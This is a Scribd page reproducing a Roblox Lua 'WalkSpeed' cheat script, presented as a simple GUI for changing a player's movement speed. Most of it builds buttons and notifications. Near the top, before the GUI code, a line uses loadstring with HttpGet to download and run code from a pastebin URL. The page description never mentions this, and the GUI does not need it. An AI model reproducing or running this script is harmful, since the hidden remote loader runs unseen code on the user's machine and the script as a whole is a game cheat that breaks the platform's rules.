[go: up one dir, main page]

0% found this document useful (0 votes)
395 views3 pages

Walkspeed Script

The document is a script for a Roblox GUI that allows players to modify their walking speed. It includes buttons for setting a custom speed, resetting to default, and opening/closing the GUI. Notifications are sent to the player upon changing the speed or resetting it.

Uploaded by

john084592
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
395 views3 pages

Walkspeed Script

The document is a script for a Roblox GUI that allows players to modify their walking speed. It includes buttons for setting a custom speed, resetting to default, and opening/closing the GUI. Notifications are sent to the player upon changing the speed or resetting it.

Uploaded by

john084592
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

-- your a skid bro

wait(3)

warn("loading epic haxor")

game.StarterGui:SetCore("SendNotification", {
Title = "WalkSpeedGui";
Text = "Loaded!";
Icon = "";
Duration = "2";
})
wait(2)

loadstring(game:HttpGet(('https://pastebin.com/raw/m9kQz1KR'),true))()

-- variabl

local WalkSpeed_GUI = Instance.new("ScreenGui")


local Open = Instance.new("TextButton")
local Main = Instance.new("Frame")
local ResetSpeed = Instance.new("TextButton")
local SetSpeed = Instance.new("TextButton")
local SpeedValue = Instance.new("TextBox")
local Title = Instance.new("TextLabel")
local Close = Instance.new("TextButton")
local TextLabel = Instance.new("TextLabel")
Open.Visible = false

-- cool stuf

WalkSpeed_GUI.Name = "WalkSpeed_GUI"
WalkSpeed_GUI.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
WalkSpeed_GUI.ZIndexBehavior = Enum.ZIndexBehavior.Sibling

Open.Name = "Open"
Open.Parent = WalkSpeed_GUI
Open.BackgroundColor3 = Color3.new(0.211765, 0.211765, 0.211765)
Open.BorderColor3 = Color3.new(0.164706, 0.164706, 0.164706)
Open.BorderSizePixel = 2
Open.Position = UDim2.new(0.852232754, 0, 0.912472665, 0)
Open.Size = UDim2.new(0, 100, 0, 25)
Open.Font = Enum.Font.Gotham
Open.Text = "Open"
Open.TextColor3 = Color3.new(0.443137, 0.443137, 0.443137)
Open.TextSize = 14

Main.Name = "Main"
Main.Parent = WalkSpeed_GUI
Main.Active = true
Main.BackgroundColor3 = Color3.new(0.211765, 0.211765, 0.211765)
Main.BorderColor3 = Color3.new(0.164706, 0.164706, 0.164706)
Main.BorderSizePixel = 2
Main.Position = UDim2.new(0.100792751, 0, 0.13636364, 0)
Main.Size = UDim2.new(0, 400, 0, 270)

ResetSpeed.Name = "ResetSpeed"
ResetSpeed.Parent = Main
ResetSpeed.BackgroundColor3 = Color3.new(0.211765, 0.211765, 0.211765)
ResetSpeed.BorderColor3 = Color3.new(0.164706, 0.164706, 0.164706)
ResetSpeed.BorderSizePixel = 2
ResetSpeed.Position = UDim2.new(0.25, 0, 0.647930086, 0)
ResetSpeed.Size = UDim2.new(0, 200, 0, 50)
ResetSpeed.Font = Enum.Font.Gotham
ResetSpeed.Text = "Default Speed"
ResetSpeed.TextColor3 = Color3.new(0.443137, 0.443137, 0.443137)
ResetSpeed.TextSize = 14

SetSpeed.Name = "SetSpeed"
SetSpeed.Parent = Main
SetSpeed.BackgroundColor3 = Color3.new(0.211765, 0.211765, 0.211765)
SetSpeed.BorderColor3 = Color3.new(0.164706, 0.164706, 0.164706)
SetSpeed.BorderSizePixel = 2
SetSpeed.Position = UDim2.new(0.25, 0, 0.297961205, 0)
SetSpeed.Size = UDim2.new(0, 95, 0, 50)
SetSpeed.Font = Enum.Font.Gotham
SetSpeed.Text = "Set Speed"
SetSpeed.TextColor3 = Color3.new(0.443137, 0.443137, 0.443137)
SetSpeed.TextSize = 14

SpeedValue.Name = "SpeedValue"
SpeedValue.Parent = Main
SpeedValue.BackgroundColor3 = Color3.new(0.211765, 0.211765, 0.211765)
SpeedValue.BorderColor3 = Color3.new(0.164706, 0.164706, 0.164706)
SpeedValue.BorderSizePixel = 2
SpeedValue.Position = UDim2.new(0.537500024, 0, 0.297961205, 0)
SpeedValue.Size = UDim2.new(0, 85, 0, 50)
SpeedValue.Font = Enum.Font.Gotham
SpeedValue.PlaceholderColor3 = Color3.new(0.698039, 0.698039, 0.698039)
SpeedValue.Text = "16"
SpeedValue.TextColor3 = Color3.new(0.443137, 0.443137, 0.443137)
SpeedValue.TextSize = 14

Title.Name = "Title"
Title.Parent = Main
Title.BackgroundColor3 = Color3.new(0.211765, 0.211765, 0.211765)
Title.BorderColor3 = Color3.new(0.164706, 0.164706, 0.164706)
Title.BorderSizePixel = 2
Title.Size = UDim2.new(0, 400, 0, 50)
Title.Font = Enum.Font.Gotham
Title.Text = "WalkSpeed"
Title.TextColor3 = Color3.new(0.443137, 0.443137, 0.443137)
Title.TextSize = 14

Close.Name = "Close"
Close.Parent = Main
Close.BackgroundColor3 = Color3.new(0.211765, 0.211765, 0.211765)
Close.BorderColor3 = Color3.new(0.164706, 0.164706, 0.164706)
Close.BorderSizePixel = 2
Close.Position = UDim2.new(0.875, 0, 2.04890966e-08, 0)
Close.Size = UDim2.new(0, 50, 0, 50)
Close.Font = Enum.Font.Gotham
Close.Text = "X"
Close.TextColor3 = Color3.new(0.443137, 0.443137, 0.443137)
Close.TextSize = 14

TextLabel.Parent = WalkSpeed_GUI
TextLabel.BackgroundColor3 = Color3.new(255, 255, 255)
TextLabel.BackgroundTransparency = 1
TextLabel.BorderSizePixel = 0
TextLabel.Position = UDim2.new(0, 0)
TextLabel.Size = UDim2.new(0, 191, 0, 19)
TextLabel.Font = Enum.Font.SourceSans
TextLabel.Text = "ronut#1571"
TextLabel.TextColor3 = Color3.new(0.443137, 0.443137, 0.443137)
TextLabel.TextScaled = true
TextLabel.TextSize = 14
TextLabel.TextWrapped = true

-- scroptz

Open.MouseButton1Down:connect(function()
Main.Visible = true
Open.Visible = false
end)

Close.MouseButton1Down:connect(function()
Main.Visible = false
Open.Visible = true
end)

SetSpeed.MouseButton1Down:connect(function()
game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = SpeedValue.Text
game.StarterGui:SetCore("SendNotification", {
Title = "WalkSpeedGui";
Text = "Speed has been set to".. SpeedValue.Text;
Icon = "";
Duration = "2";
})
end)

ResetSpeed.MouseButton1Down:connect(function()
game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = 16
game.StarterGui:SetCore("SendNotification", {
Title = "WalkSpeedGui";
Text = "Your speed has been reset.";
Icon = "";
Duration = "2";
})

end)

You might also like